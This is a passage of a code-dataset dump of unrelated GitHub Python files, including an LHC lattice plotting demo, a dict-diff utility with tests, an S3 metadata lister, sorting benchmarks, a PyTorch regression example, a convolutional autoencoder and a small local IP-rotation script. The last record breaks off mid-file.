lw=3)\nplt.tight_layout()\nplt.show()\n\nmadx.exit()\n\n###############################################################################\n# One can customise the plot more to their liking or needs thanks to the other\n# function parameters. Let's showcase this with the LHC lattice, that we set up\n# below.\n#\n# .. important::\n# This example requires the `acc-models-lhc` repository to be cloned locally. One\n# can get it by running the following command:\n#\n# .. code-block:: bash\n#\n# git clone -b 2022 https://gitlab.cern.ch/acc-models/acc-models-lhc.git --depth 1\n#\n# Here I set the 2022 branch for stability and reproducibility of the documentation\n# builds, but you can use any branch you want.\n\nlhc_madx: Madx = lhc.prepare_lhc_run3(\n opticsfile=\"acc-models-lhc/operation/optics/R2022a_A30cmC30cmA10mL200cm.madx\",\n stdout=False\n)\n\n###############################################################################\n# The `~.plotting.lattice.plot_latwiss` function gives the possibility to zoom on\n# a region by providing the *xlimits* parameter. Let's first determine the position\n# of points of interest through the ``TWISS`` table:\n\nlhc_madx.command.twiss()\ntwiss_df = lhc_madx.table.twiss.dframe()\ntwiss_df.name = twiss_df.name.apply(lambda x: x[:-2])\nip1s = twiss_df.s[\"ip1\"]\n\n###############################################################################\n# We can now focus the plot in the Interaction Region 1 by providing the *xlimits*\n# centered around the value we determined for *ip1s*.\n#\n# .. tip::\n# In order to zoom on a region, one might be tempted to call the plot and run ``plt.xlim(...)``.\n# However, when providing the *xlimits* parameter, `~.plotting.lattice.plot_latwiss` makes a sub-selection\n# of the ``TWISS`` table before doing any plotting. This is provides a nice speedup to the plotting\n# process, as only elements within the limits are rendered on the layout axis, instead of all elements\n# (which can be a lot, and quite lengthy for big machines such as the LHC). It is therefore the recommended\n# way to zoom on a region.\n\nplt.figure(figsize=(18, 11))\nplot_latwiss(\n lhc_madx,\n title=\"Interaction Region 1\",\n disp_ylim=(-0.5, 2.5),\n xlimits=(ip1s - 457, ip1s + 457),\n k0l_lim=(-1.3e-2, 1.3e-2),\n k1l_lim=(-6.1e-2, 6.1e-2),\n lw=1.5,\n)\nplt.axvline(x=ip1s, color=\"grey\", ls=\"--\", lw=1.5, label=\"IP1\")\nplt.tight_layout()\nplt.show()\n\n###############################################################################\n# Using the *xoffset* parameter, one can shift the longitudinal coordinate to be\n# centered on 0, with the horizontal axis showing relative position to the given\n# *xoffset*. This is useful here to zoom closely on IP1 and see the elements'\n# positions relative to the IP marker.\n\nplt.figure(figsize=(18, 11))\nplot_latwiss(\n lhc_madx,\n title=\"IP1 Surroundings\",\n disp_ylim=(-3e-2, 3e-2),\n xoffset=ip1s,\n xlimits=(-85, 85),\n k0l_lim=(-4e-4, 4e-4),\n k1l_lim=(-6e-2, 6e-2),\n lw=1.5,\n)\nplt.axvline(x=0, color=\"grey\", ls=\"--\", lw=1.5, label=\"IP1\")\nplt.tight_layout()\nplt.show()\n\n###############################################################################\n# When and only when the *k2l_lim* parameter is provided, the sextupolar elements\n# are plotted on the lattice layout axis, and an additional scale is put to the right.\n# This is useful to see sextupoles when zooming in, which you would not necessarily\n# want to plot when looking at the big picture, to avoid overcrowding it. Similarly,\n# providing the *plot_bpms* will add a small marker for BPM elements. Here it is\n# showcased when looking at an LHC arc cell:\n\nplt.rcParams.update({\"axes.formatter.limits\": (-2, 5)}) # convenience\nplt.figure(figsize=(18, 11))\nplot_latwiss(\n lhc_madx,\n title=\"LHC Arc Cell\",\n plot_bpms=True,\n disp_ylim=(-0.5, 20),\n beta_ylim=(0, 200),\n k0l_lim=(-3e-2, 3e-2),\n k1l_lim=(-4e-2, 4e-2),\n k2l_lim=(-5e-2, 5e-2),\n lw=1.5,\n xlimits=(14_084.5, 14_191.3),\n)\nplt.tight_layout()\nplt.show()\n\n###############################################################################\n# Let's not forget to close the rpc connection to ``MAD-X``:\n\nlhc_madx.exit()\n\n#############################################################################\n#\n# .. admonition:: References\n#\n# The use of the following functions, methods, classes and modules is shown\n# in this example:\n#\n# - `~.cpymadtools.lhc`: `~.lhc._setup.prepare_lhc_run3`, `~.lhc._setup.setup_lhc_orbit`\n# - `~.cpymadtools.generators`: `~.generators.LatticeGenerator`\n# - `~.cpymadtools.matching`: `~.matching.match_tunes_and_chromaticities`\n# - `~.plotting.lattice`: `~.plotting.lattice.plot_latwiss`\n","repo_name":"fsoubelet/PyhDToolkit","sub_path":"examples/demo_lattice.py","file_name":"demo_lattice.py","file_ext":"py","file_size_in_byte":6783,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"25048963139","text":"from typing import Dict, Hashable, Union, Tuple, Any\nfrom pprint import pprint\nfrom copy import deepcopy\nimport unittest\n\n\nclass DictTuple(tuple):\n \"\"\"Used for separating from regular tuples\"\"\"\n\n def __repr__(self):\n return f\"#{super().__repr__()[1:-1]}#\"\n\n\nclass _Undefined:\n \"\"\"Flag for non-existing value\"\"\"\n\n def __repr__(self):\n return \"undefined\"\n\n\nundefined = _Undefined()\n\n\ndef recursiveitems(d: Dict):\n for key, val in d.items():\n if type(val) == dict:\n yield (key, DictTuple(recursiveitems(val)))\n elif type(val) == list:\n yield (key, tuple(val))\n else:\n yield (key, val)\n\n\ndef difference(a: Dict, b: Dict):\n a_set = set(recursiveitems(a))\n b_set = set(recursiveitems(b))\n diffs = a_set.symmetric_difference(b_set)\n changes = {}\n for key, val in diffs:\n if type(val) == DictTuple:\n changes[key] = difference(a.get(key, undefined), b.get(key, undefined))\n else:\n changes[key] = (a.get(key, undefined), b.get(key, undefined))\n\n return changes\n\n\ndef _apply(\n d: Dict,\n changes: Dict[Hashable, Union[Tuple[Any, Any], Dict]],\n delete: bool,\n add: bool,\n update: bool,\n):\n for key, val in changes.items():\n if type(val) == dict:\n _apply(d.get(key), val, delete, add, update)\n continue\n\n before, after = val\n if delete and (after is undefined):\n del d[key]\n continue\n\n if (add and (before is undefined)) or update:\n d[key] = after\n continue\n\n return d\n\n\ndef apply(\n d: Dict,\n diff: Dict[Hashable, Union[Tuple[Any, Any], Dict]],\n *,\n delete: bool = True,\n add: bool = True,\n update: bool = True,\n mutate: bool = False,\n):\n target = d if mutate else deepcopy(d)\n result = _apply(target, diff, delete, add, update)\n return None if mutate else result\n\n\nclass Test(unittest.TestCase):\n def test_recursiveitems(self):\n d = {\n \"a\": 1,\n \"b\": \"A string\",\n \"c\": (1, 2, 3),\n \"d\": [4, 5, 6],\n \"e\": {\n \"f\": None,\n },\n }\n\n items = list(recursiveitems(d))\n expected = [\n (\"a\", 1),\n (\"b\", \"A string\"),\n (\"c\", (1, 2, 3)),\n (\"d\", (4, 5, 6)),\n (\"e\", DictTuple([(\"f\", None)])),\n ]\n\n self.assertListEqual(items, expected)\n\n a = {\n \"a\": 1,\n \"b\": \"A string\",\n \"c\": (1, 2, 3),\n \"d\": [1, 2, 3],\n \"e\": {\n \"f\": 1,\n \"g\": {},\n },\n \"i\": {\n \"j\": 1,\n \"k\": {\"l\": 0},\n },\n \"m\": 123,\n \"n\": frozenset((7, 6, 8)),\n }\n\n b = {\n \"a\": 1,\n \"b\": \"A string!!!\",\n \"c\": (1, 2, 3),\n \"d\": [2, 4],\n \"e\": {\n \"f\": 1,\n \"g\": {\"h\": \"help\"},\n },\n \"i\": {\n \"j\": 43,\n \"k\": {\"l\": 0},\n },\n \"n\": frozenset((9, 8)),\n }\n\n diff = {\n \"b\": (\"A string\", \"A string!!!\"),\n \"d\": ([1, 2, 3], [2, 4]),\n \"e\": {\n \"g\": {\n \"h\": (undefined, \"help\"),\n },\n },\n \"i\": {\n \"j\": (1, 43),\n },\n \"m\": (123, undefined),\n \"n\": (frozenset((7, 6, 8)), frozenset((9, 8))),\n }\n\n def test_diff(self):\n diff = difference(self.a, self.b)\n self.assertDictEqual(diff, self.diff)\n\n def test_apply(self):\n b = apply(self.a, self.diff)\n self.assertDictEqual(b, self.b)\n\n def test_apply_mutate(self):\n a = deepcopy(self.a)\n apply(a, self.diff, mutate=True)\n self.assertDictEqual(a, self.b)\n\n def test_apply_update_only(self):\n a = {\n \"a\": {\n \"delete\": 1,\n \"update\": 3,\n },\n }\n\n diff = {\n \"a\": {\n \"delete\": (1, undefined),\n \"update\": (3, 2),\n \"add\": (undefined, 123),\n }\n }\n\n b = apply(a, diff)\n expected = {\n \"a\": {\"update\": 2, \"add\": 123},\n }\n\n self.assertDictEqual(b, expected)\n\n def test_apply_delete_only(self):\n a = {\n \"a\": {\n \"delete\": 1,\n \"update\": 3,\n },\n }\n\n diff = {\n \"a\": {\n \"delete\": (1, undefined),\n \"update\": (3, 2),\n \"add\": (undefined, 123),\n }\n }\n\n b = apply(a, diff, update=False, add=False)\n expected = {\n \"a\": {\n \"update\": 3,\n },\n }\n\n self.assertDictEqual(b, expected)\n\n def test_apply_add_only(self):\n a = {\n \"a\": {\n \"delete\": 1,\n \"update\": 3,\n },\n }\n\n diff = {\n \"a\": {\n \"delete\": (1, undefined),\n \"update\": (3, 2),\n \"add\": (undefined, 123),\n }\n }\n\n b = apply(a, diff, update=False, delete=False)\n expected = {\n \"a\": {\n \"delete\": 1,\n \"update\": 3,\n \"add\": 123,\n },\n }\n\n self.assertDictEqual(b, expected)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Napam/JallaResearch","sub_path":"dictdiff/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"29797426534","text":"#\tAngkan Biswas\n#\t10.04.2020\n#\tCapture a video file.\n\nimport cv2\nimport numpy as np\n\ncamera = cv2.VideoCapture(0)\t\t\t\t\t\t\t#\tOpen a cemera.\n\nfor i in range(100): \n\t_, frame = camera.read()\t\t\t\t\t\t#\tTake a frame.\n\t\n\tresizeFrame = cv2.resize(frame,(300,200))\t\t\t\t# \tResize the freame.\n\tnegativeFrame = 255 - resizeFrame\t\t\t\t\t#\tNegative frame\n\tconcateFrame = np.concatenate((resizeFrame, negativeFrame), axis = 1) \t#\tAdd two frames side by side\n\t\n\tcv2.imshow('My Face',concateFrame)\t\t\t\t\t#\tDisplay the frame.\n\tcv2.waitKey(10)\t\t\t\t\t\t\t\t#\tHold the display window for 50 millisecond\n\ncamera.release()\t\t\t\t\t\t\t\t#\tRelease the captured camera\n\n\n\n\n\n\n\n\n\n\n","repo_name":"BiswasAngkan/OpenCV","sub_path":"MakeVideoFile_Positive_Negative.py","file_name":"MakeVideoFile_Positive_Negative.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"37601401764","text":"import os\nimport datetime\nfrom tqdm import tqdm\nimport pandas as pd\n\nimport boto3\n\nDICT_GSMAP_UNIT = {\n 'Latitude': 'degrees',\n 'Longitude': 'degrees',\n 'hourlyPrecipRate': 'mm/hr',\n 'hourlyPrecipRateGC': 'mm/hr',\n 'monthlyPrecipRate': 'mm/hr',\n 'monthlyPrecipRateGC': 'mm/hr',\n 'standardDeviation': 'mm/hr',\n 'gaugeQualityInfo': 'counts/day',\n 'snowProbability': '%'\n}\n\nEXT = ['.h5', '.hdf', '.HDF', '.tif']\n\ndef get_meta_list_GSMaP(s3_bucket_name, s3_dir_parent):\n s3 = boto3.resource('s3')\n bucket = s3.Bucket(s3_bucket_name)\n s3_cl = boto3.client('s3')\n bucket_location = s3_cl.get_bucket_location(Bucket=s3_bucket_name)\n\n list_path = []\n for bucket_object in bucket.objects.filter(Prefix=s3_dir_parent):\n list_path.append(bucket_object.key)\n\n list_dict_meta = []\n for path in tqdm(list_path):\n filename = os.path.basename(path)\n if os.path.splitext(filename)[-1] not in EXT:\n continue\n\n filename_part = filename.split('_')\n dict_info = {\n 'filename': filename,\n 'mission_id': filename_part[0],\n 'sensor_id': filename_part[1],\n 'scene_start_datetime': filename_part[2],\n 'process_unit': filename_part[3],\n 'process_level': filename_part[4],\n 'product_version': filename_part[6],\n 'bucket_name': s3_bucket_name,\n 'path': path,\n 'url': \"https://{0}.s3-{1}.amazonaws.com/{2}\".format(s3_bucket_name,\n bucket_location['LocationConstraint'], path)\n }\n if dict_info['process_unit'] == 'H':\n dict_info['scene_start_datetime'] = datetime.datetime.strptime(dict_info['scene_start_datetime'],\n '%y%m%d%H%M')\n dict_info['process_unit'] = 'Hourly'\n elif dict_info['process_unit'] == 'M':\n dict_info['scene_start_datetime'] = datetime.datetime.strptime(dict_info['scene_start_datetime'], '%y%m')\n dict_info['process_unit'] = 'Monthly'\n\n if dict_info['process_level'][-1] == 'S':\n dict_info['process_level'] = 'Standard'\n elif dict_info['process_level'][-1] == 'N':\n dict_info['process_level'] = 'Near real time'\n\n if len(filename_part) >= 9:\n dict_info['group_name'] = filename_part[7]\n dict_info['element'] = filename_part[8]\n dict_info['unit'] = DICT_GSMAP_UNIT.get(dict_info['element'], '')\n if len(filename_part) >= 11:\n dict_info['epsg_code'] = int(filename_part[9])\n dict_info['region_name'] = filename_part[10]\n\n list_dict_meta.append(dict_info)\n\n df = pd.DataFrame.from_dict(list_dict_meta)\n return df\n","repo_name":"DeepHTS/Data-GSMaP","sub_path":"src/s3_metainfo.py","file_name":"s3_metainfo.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26010423014","text":"# Find the number of seconds it takes to run any operation\n# Output it in a format that can be graphed in google sheets\n\nfrom time import time\nimport random\n\n\n\n# STRETCH: implement the Bubble Sort function below\ndef bubble_sort( arr ):\n # Repeat this until you make it through an entire pass without any swaps.\n is_sorted = False\n while not is_sorted:\n is_sorted = True\n # Walk through the array\n for i in range(len(arr) - 1):\n # comparing each element to its right neighbor.\n # If it's smaller than that neighbor,\n if arr[i] > arr[i + 1]:\n # swap the elements.\n arr[i], arr[i+1] = arr[i+1], arr[i]\n is_sorted = False\n # return arr\n\n\n\n# TO-DO: implement the Insertion Sort function below\ndef insertion_sort( arr ):\n # For each element after the first\n for i in range(1, len(arr)):\n # Find the right spot for the element in the sorted sub-array on the left\n # Insert it there:\n # Store the current element\n current_element = arr[i]\n # walk backwards through the sublist, shifting elements to the right by 1\n j = i - 1\n while j >= 0 and current_element < arr[j]:\n arr[j + 1] = arr[j]\n j -= 1\n # Until we reach a smaller or equal element, then put the current element in that place\n arr[j+1] = current_element\n return arr\n\n\n\nl = [random.randint(0, 1000) for i in range(0, 10000)]\n\nstart_time = time()\n# Run our code\nbubble_sort(l)\n# Store the ending time\nend_time = time()\nprint (f\"Quadratic runtime: {end_time - start_time} seconds\")\n\n\nl = [random.randint(0, 1000) for i in range(0, 10000)]\n\ninputSizes = [i * 100 for i in range(1, 30)]\ntimes = []\n\nfor inputSize in inputSizes:\n print(f\"running: {inputSize}\")\n l = [random.randint(0, 1000) for i in range(0, inputSize)]\n # Store a starting time\n start_time = time()\n # Run our code\n insertion_sort(l)\n # Store the ending time\n end_time = time()\n # Print out the ending time - starting time\n times.append(end_time - start_time)\n\n\nprint(\"LENGTHS\")\nfor element in inputSizes:\n print(element)\n\nprint(\"TIMES\")\nfor t in times:\n print(t)\n\n\n\n\n\n","repo_name":"br80/lambda_cs","sub_path":"timing.py","file_name":"timing.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"21791158104","text":"import numpy as np\n\nfrom keras import optimizers\n\nfrom keras.models import Model\n\nfrom keras.layers import Input, Dense, Flatten, MaxPooling2D, UpSampling2D, Reshape, BatchNormalization, Conv2D\n\nfrom .model_utils import activation_function\n\nfrom habitat_modelling.ml.keras.models.blocks import resnet_inception_block, inception_downsample, inception_block, conv_block_downsample, deconv_block_upsample, dense_block, conv_block\n\n\n\nclass ConvAutoEncoder:\n \"\"\"\n ConvAutoEncoder: A convolutional autoencoder for use with image inputs.\n\n To Use:\n cae = ConvAutoEncoder(image_shape=(256,256,3),\n latent_dim=100,\n downsampling=args.downsampling,\n block_filters=[64,64,64,32,32],\n batch_norm=args.batch_norm,\n activation_cfg=activation_cfg)\n\n cae.create_model()\n cae.compile()\n cae.aa.train_on_batch(X,X)\n\n \"\"\"\n def __init__(self,\n image_shape,\n conv_filters,\n latent_dim,\n downsampling='stride',\n block_type='plain',\n lr=1e-4,\n loss='mean_squared_error',\n activation_cfg=None,\n batch_norm=False,\n encoder_weights=None,\n generator_weights=None):\n \"\"\"\n Initialises the autoencoder with the default parameters\n Args:\n image_shape: (tuple) The image shape to be used. Height,width must be divisible by 2**len(block_filters).\n block_filters: (list) the number of filters in each block. Length of the list is equal to amount of downsampling.\n latent_dim: (int) the number of units in the latent dimension\n downsampling: (str) The downsampling strategy to use. Either 'pool' or 'stride'.\n block_type: (str) The type of network block to use, options are {plain, inception, inception_downsample, resnet_inception}.\n lr: (float) The learning rate for the model\n loss: (str) The loss function used, options are {mean_squared_error}\n activation_cfg: (dict) Configure the activations used. If None, uses ReLU.\n batch_norm: (bool) Whether to use batch norm\n encoder_weights: (str) Path to the weights to load into the encoder. Loads by name so doesn't have to match.\n generator_weights: (str) Path to the weights to load into the generator. Loads by name so doesn't have to match.\n \"\"\"\n self.image_input = None\n self.encoder = None\n self.decoder = None\n self.ae = None\n\n # Params\n self.image_shape = image_shape\n self.block_type = block_type\n\n self.image_input = None\n self.encoder = None\n self.decoder = None\n self.ae = None\n\n self.activation_cfg = activation_cfg\n self.conv_filters = conv_filters\n self.downsampling = downsampling\n self.batch_norm = batch_norm\n self.latent_dim = latent_dim\n self.lr = lr\n self.loss = loss\n\n self.encoder_weights = encoder_weights\n self.generator_weights = generator_weights\n\n def create_encoder(self, weights_path=None):\n \"\"\"Creates the encoder\n\n Args:\n weights_path (str): Path to the weights of the model (loaded via name).\n\n Returns:\n Model: The image encoder model\n\n \"\"\"\n # img_input = Input(tuple(self.image_shape), name=\"img_input\")\n\n model_prefix = 'encoder/'\n\n # m = img_input\n m = self.image_input\n\n for i,ft in enumerate(self.conv_filters):\n if self.block_type == 'plain':\n m = conv_block_downsample(m, ft, downsampling=self.downsampling, batch_norm=self.batch_norm, activation_cfg=self.activation_cfg, name_prefix=model_prefix + 'conv_block_%d/'%i)\n elif self.block_type == 'inception':\n m = inception_block(m, ft, activation_cfg=self.activation_cfg, batch_norm=self.batch_norm, name_prefix=model_prefix + 'inception_block_%d/'%i)\n m = MaxPooling2D(name=model_prefix + 'max_pool_%d' %i)(m)\n elif self.block_type == 'inception_downsample':\n m = inception_downsample(m, ft, activation_cfg=self.activation_cfg, batch_norm=self.batch_norm, name_prefix=model_prefix + 'inception_block_%d/'%i)\n elif self.block_type == 'resnet_inception':\n m = resnet_inception_block(m, ft, activation_cfg=self.activation_cfg, batch_norm=self.batch_norm, name_prefix=model_prefix + 'resnet_block_%d/'%i)\n m = MaxPooling2D(name=model_prefix + 'max_pool_%d'%i)(m)\n else:\n raise ValueError(\"Block type (%s) not implemented\"%self.block_type)\n\n m = Flatten()(m)\n\n z = Dense(self.latent_dim, name=model_prefix+'z')(m)\n\n encoder = Model(self.image_input, z, name='encoder')\n\n if weights_path:\n encoder.load_weights(weights_path, by_name=True, skip_mismatch=True)\n\n return encoder\n\n def create_generator(self, weights_path=None, solo=False):\n \"\"\"\n Creates the generator, (also the decoder). Calling it the generator for consistency with GAN models.\n\n Args:\n weights_path (str): Path to the weights of the model (loaded via name).\n solo (str): Path to the weights of the model (loaded via name).\n\n Returns:\n (Model): The generator\n \"\"\"\n\n last_conv_shape = (self.image_shape[0] // (2 ** len(self.conv_filters)), self.image_shape[1] // (2 ** len(self.conv_filters)), 3)\n\n model_prefix = 'image/generator/'\n\n zi = Input((self.latent_dim,), name=model_prefix+'zi')\n m = zi\n m = Dense(np.prod(last_conv_shape))(m)\n m = activation_function(m, self.activation_cfg)\n m = Reshape(last_conv_shape)(m)\n\n for i,ft in enumerate(self.conv_filters[::-1]):\n if self.block_type == 'plain':\n m = deconv_block_upsample(m, ft, batch_norm=self.batch_norm, name_prefix=model_prefix + 'conv_block_%d/'%i)\n elif self.block_type == 'inception':\n m = UpSampling2D(name=model_prefix+'upsample_%d'%i)(m)\n m = inception_block(m, ft, activation_cfg=self.activation_cfg, batch_norm=self.batch_norm, name_prefix=model_prefix + 'inception_block_%d/'%i)\n elif self.block_type == 'inception_downsample':\n m = UpSampling2D(name=model_prefix+'upsample_%d'%i)(m)\n m = inception_downsample(m, ft, activation_cfg=self.activation_cfg, batch_norm=self.batch_norm, name_prefix=model_prefix + 'inception_block_%d/'%i)\n elif self.block_type == 'resnet_inception':\n m = UpSampling2D(name=model_prefix+'upsample_%d'%i)(m)\n m = resnet_inception_block(m, ft, activation_cfg=self.activation_cfg, batch_norm=self.batch_norm, name_prefix=model_prefix + 'resnet_block_%d/'%i)\n else:\n raise ValueError(\"Block type (%s) not implemented\" % self.block_type)\n\n generated = Conv2D(self.image_shape[2], kernel_size=(1, 1), padding='same', activation='tanh', name=model_prefix + 'generated_output')(m)\n\n generator = Model(zi, generated, name='generator')\n\n if weights_path:\n generator.load_weights(weights_path, by_name=True, skip_mismatch=True)\n\n return generator\n\n\n def build_autoencoder(self):\n \"\"\"\n Creates the autoencoder model\n Returns:\n None\n \"\"\"\n self.image_input = Input(self.image_shape)\n\n self.encoder = self.create_encoder(self.encoder_weights)\n self.decoder = self.create_generator(self.generator_weights)\n self.ae = Model(self.image_input, self.decoder(self.encoder(self.image_input)), name='autoencoder')\n\n adam = optimizers.Adam(lr=self.lr)\n self.ae.compile(adam, loss=self.loss)\n\n","repo_name":"jacksonhshields/habitat-modelling-export","sub_path":"habitat_modelling/ml/keras/models/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":7961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"10943036310","text":"from __future__ import print_function\nimport argparse\nimport json\nfrom src.factories.factory_evaluator import EvaluatorFactory\nfrom src.factories.factory_data_io import DataIOFactory\nfrom src.factories.factory_tagger import TaggerFactory\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Run trained model')\n parser.add_argument('load', help='Path to load from the trained model.',\n default='pretrained/tagger_NER_BiLSTMCNNCRF.hdf5')\n parser.add_argument('input', help='Input CoNNL filename.')\n parser.add_argument('--output', '-o', help='Output JSON filename.',\n default='out.json')\n parser.add_argument('--data-io', '-d', choices=['connl-ner-2003',\n 'connl-pe',\n 'connl-wd'],\n default='connl-ner-2003', help='Data read file format.')\n parser.add_argument('--evaluator', '-v', default='f1-connl',\n help='Evaluation method.',\n choices=['f1-connl', 'f1-alpha-match-10',\n 'f1-alpha-match-05', 'f1-macro', 'f05-macro',\n 'token-acc'])\n parser.add_argument('--gpu', '-g', type=int, default=0,\n help='GPU device number, 0 by default, -1 means CPU.')\n print('Start run_tagger.py.')\n args = parser.parse_args()\n # Load tagger model\n tagger = TaggerFactory.load(args.load, args.gpu)\n # Create DataIO object\n data_io = DataIOFactory.create(args)\n # Read data in CoNNL-2003 file format format\n word_sequences, targets_tag_sequences_test = \\\n data_io.read_data(args.input)\n # Create evaluator\n evaluator = EvaluatorFactory.create(args)\n # Get tags as sequences of strings\n output_tag_sequences_test = tagger.predict_tags_from_words(word_sequences,\n batch_size=100)\n test_score, test_msg = \\\n evaluator.get_evaluation_score(targets_tag_sequences=targets_tag_sequences_test,\n outputs_tag_sequences=output_tag_sequences_test,\n word_sequences=word_sequences)\n # Show the evaluation results\n print('\\n\\n%s = %1.2f' % (args.evaluator, test_score))\n print(test_msg)\n # Write results to text file\n with open(args.output, 'w') as f:\n json.dump(output_tag_sequences_test, f)\n print('\\nThe end.')\n","repo_name":"achernodub/targer","sub_path":"run_tagger.py","file_name":"run_tagger.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":249,"dataset":"github-code","pt":"29"} +{"seq_id":"29779005338","text":"import torch\nfrom time import perf_counter\nfrom torch import nn, optim as optim\nfrom time import perf_counter\nimport mars_comm\n\nx = torch.unsqueeze(torch.linspace(-3,3, 1000), dim=1)\ny = x + 1.2*torch.rand(x.size())\n\nclass LR(nn.Module):\n def __init__(self):\n super(LR, self).__init__()\n self.linear = nn.Linear(1,1)\n\n def forward(self, x):\n out = self.linear(x)\n return out\n\nif mars_comm.CUDA:\n LR_model = LR().cuda()\n inputs = x.cuda()\n target = y.cuda()\nelse:\n LR_model = LR()\n inputs = x\n target = y\n\ncriterion = nn.MSELoss()\noptimizer = optim.SGD(LR_model.parameters(), lr=1e-2)\n\ndef train(model, criterion, optimizer, epochs):\n for epoch in range(epochs):\n output = model(inputs)\n loss = criterion(output, target)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n #if epochs % 1000 == 0:\n # mars_comm.draw(output, loss)\n return model, loss\n\nstart = perf_counter()\nw,loss = train(LR_model, criterion, optimizer, 1000)\nfinish = perf_counter()\ntime = finish - start\nprint(\"计算时间:%s\" % time)\nprint(\"final loss:\", loss.item())\nprint(\"weights:\", list(LR_model.parameters()))\n","repo_name":"seaside-play/technical-summary","sub_path":"machine_learning/deeplearning/pytorch/test_nn.py","file_name":"test_nn.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"23258727953","text":"class Solution:\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n 首先我们来看如何找到两个数列的第k小个数,即程序中getKth(A, B , k)函数的实现。用一个例子来说明这个问题:A = {1,3,5,7};\n B = {2,4,6,8,9,10};如果要求第7个小的数,A数列的元素个数为4,B数列的元素个数为6;k/2 = 7/2 = 3,而A中的第3个数A[2]=5;\n B中的第3个数B[2]=6;而A[2] lenB:\n return self.getKth(B, A, k)\n if lenA == 0:\n return B[k - 1]\n if k == 1:\n return min(A[0], B[0])\n pa = min(k // 2, lenA)\n pb = k - pa\n if A[pa - 1] < B[pb - 1]:\n return self.getKth(A[pa:], B, pb)\n else:\n return self.getKth(A, B[pb:], pa)\n \n\n \"\"\"\n num = nums1 + nums2\n # The time complexity for sorted is O(m+n)log(m+n) but the question requires O(log(m+n))\n num = sorted(num)\n n = len(num)\n if n % 2 == 0:\n return float((num[n // 2 - 1] + num[n // 2])) * 0.5\n return float(num[n // 2])\n \"\"\"\n\nif __name__ == \"__main__\":\n nums1 = [1, 3]\n nums2 = [2]\n\n s = Solution()\n print(s.findMedianSortedArrays(nums1, nums2))\n\n","repo_name":"codingyen/CodeAlone","sub_path":"Python/0004_median_of_two_sorted_arrays.py","file_name":"0004_median_of_two_sorted_arrays.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"3552584107","text":"# uses ifconfig to change ip to a random ip on the subnet,\n# bound by the randrange(x) as y.y.y.1 - y.y.y.x\n# time.sleep(3*60) means it waits 3 minutes between changing\n\nassert False, \"Delete this line to agree to the MIT license this code was released under\"\n\nimport os\nimport random\nimport time\nexit()\ninterface = 'tap0'\nprefix_ip = '10.8.0.'\nwhile 1:\n os.system('clear')\n os.system('ifconfig ' + interface + ' '+ prefix_ip + str(random.randrange(80)+1) + '/24')\n os.system('ifconfig ' + interface)\n time.sleep(3*60)\n","repo_name":"ChristopherMorrison/Net-Recon","sub_path":"Misc_Scipts/Randomize_IP.py","file_name":"Randomize_IP.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72928143117","text":"import torch as tc\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom .lstm import LSTM\nimport pdb\n\nclass StringEncoder(nn.Module):\n\tdef __init__(self , embed_layer , d_model , dropout = 0.0):\n\t\tsuper().__init__()\n\n\t\tself.d_model = d_model\n\n\t\tself.emb = embed_layer\n\t\tself.emb_drop = nn.Dropout(dropout)\n\n\t\tself.lstm = LSTM(d_model , d_model // 2 , 1 , True , dropout = dropout)\n\n\tdef forward(self , ent_names, ent_lens):\n\t\t'''\n\t\t\tent_names: \t(num_ent , name_len)\n\t\t\tent_lens : (num_ent)\n\t\t'''\n\t\tbsz , d_model = len(ent_lens) , self.d_model\n\n\t\ty = self.emb_drop(self.emb(ent_names))\n\t\ty = self.lstm(y , lens = ent_lens)[1].view(bsz , d_model)\n\n\t\treturn y\n\nclass EntitySelector(nn.Module):\n\tdef __init__(self , d_model , give_me_result = False):\n\t\tsuper().__init__()\n\t\tself.d_model = d_model\n\t\tself.WQ = nn.Linear(d_model , d_model)\n\t\tself.WK = nn.Linear(d_model , d_model)\n\n\t\tself.give_me_result = give_me_result\n\n\t\tif give_me_result:\n\t\t\tself.WV = nn.Linear(d_model , d_model)\n\t\t\tself.WO = nn.Linear(d_model , d_model)\n\t\t\tself.l_norm = nn.LayerNorm(d_model)\n\t\t\n\tdef forward(self , query , ent_emb , ent_idx_in_batch , max_entity_number):\n\t\t'''\n\t\t\tquery: (bsz , len , d_model)\n\t\t\tent_emb: (num_ent , d_model)\n\n\t\t\tent_idx_in_batch: form graph nodes of entitys to shape (bsz , n_ent_b) , None if bsz = 1\n\t\t'''\n\n\t\tbsz , d_model = query.size(0) , self.d_model\n\t\tquery = query.view(bsz , -1 , d_model)\n\t\ty_len = query.size(1)\n\n\t\tif ent_idx_in_batch is not None:\n\t\t\tn_ent_b = ent_idx_in_batch.size(1)\n\t\t\tmask = (ent_idx_in_batch != -1).float().view(bsz , n_ent_b , 1).requires_grad_(False)\n\t\t\tent_emb = ent_emb[ent_idx_in_batch]\n\t\telse:\n\t\t\tassert bsz == 1\n\t\t\tn_ent_b = ent_emb.size(0)\n\t\t\tmask = ent_emb.new_ones(1 , n_ent_b , 1).float().requires_grad_(False)\n\t\t\tent_emb = 